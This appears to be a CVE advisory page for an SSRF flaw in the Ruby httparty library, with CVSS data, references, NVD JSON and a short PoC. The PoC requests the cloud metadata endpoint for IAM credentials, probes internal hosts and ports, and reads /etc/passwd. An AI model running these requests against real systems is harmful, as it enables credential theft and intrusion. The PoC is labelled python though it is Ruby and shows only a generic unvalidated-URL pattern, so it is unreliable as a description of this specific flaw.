CVE-2025-68696

Description

httparty is an API tool. In versions 0.23.2 and prior, httparty is vulnerable to SSRF. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers. This issue has been patched via commit 0529bcd.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jnunemaker:httparty:*:*:*:*:*:*:*:* - VULNERABLE

httparty <= 0.23.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

require 'httparty'

# CVE-2025-68696 SSRF PoC - Httparty <= 0.23.2
# This PoC demonstrates how an attacker can exploit SSRF to access internal resources

# Example 1: Access AWS metadata service (if running on EC2)
# Attacker can steal IAM credentials
begin
  response = HTTParty.get('http://169.254.169.254/latest/meta-data/')
  puts response.body
rescue => e
  puts "Error: #{e.message}"
end

# Example 2: Access localhost/internal services
# Bypass firewall restrictions
begin
  response = HTTParty.get('http://127.0.0.1:8080/admin/config')
  puts response.body
rescue => e
  puts "Error: #{e.message}"
end

# Example 3: Port scanning internal network
# Use as proxy to scan internal services
begin
  response = HTTParty.get('http://192.168.1.1:22/')
  puts "Port 22 open: #{response.code}"
rescue => e
  puts "Port closed or filtered"
end

# Example 4: Access file:// protocol (if supported)
begin
  response = HTTParty.get('file:///etc/passwd')
  puts response.body
rescue => e
  puts "Error: #{e.message}"
end

# The vulnerable code pattern:
# user_input = params[:url]
# response = HTTParty.get(user_input)  # No validation!

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68696
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68696
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68696/
[4] VulDB https://vuldb.com/cve/CVE-2025-68696
[5] https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240
[6] https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4
[7] https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68696", "sourceIdentifier": "[email protected]", "published": "2025-12-23T23:15:45.627", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "httparty is an API tool. In versions 0.23.2 and prior, httparty is vulnerable to SSRF. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers. This issue has been patched via commit 0529bcd."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jnunemaker:httparty:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.24.0", "matchCriteriaId": "CA99A6FB-466F-4070-933D-CF6CEFB6111E"}]}]}], "references": [{"url": "https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}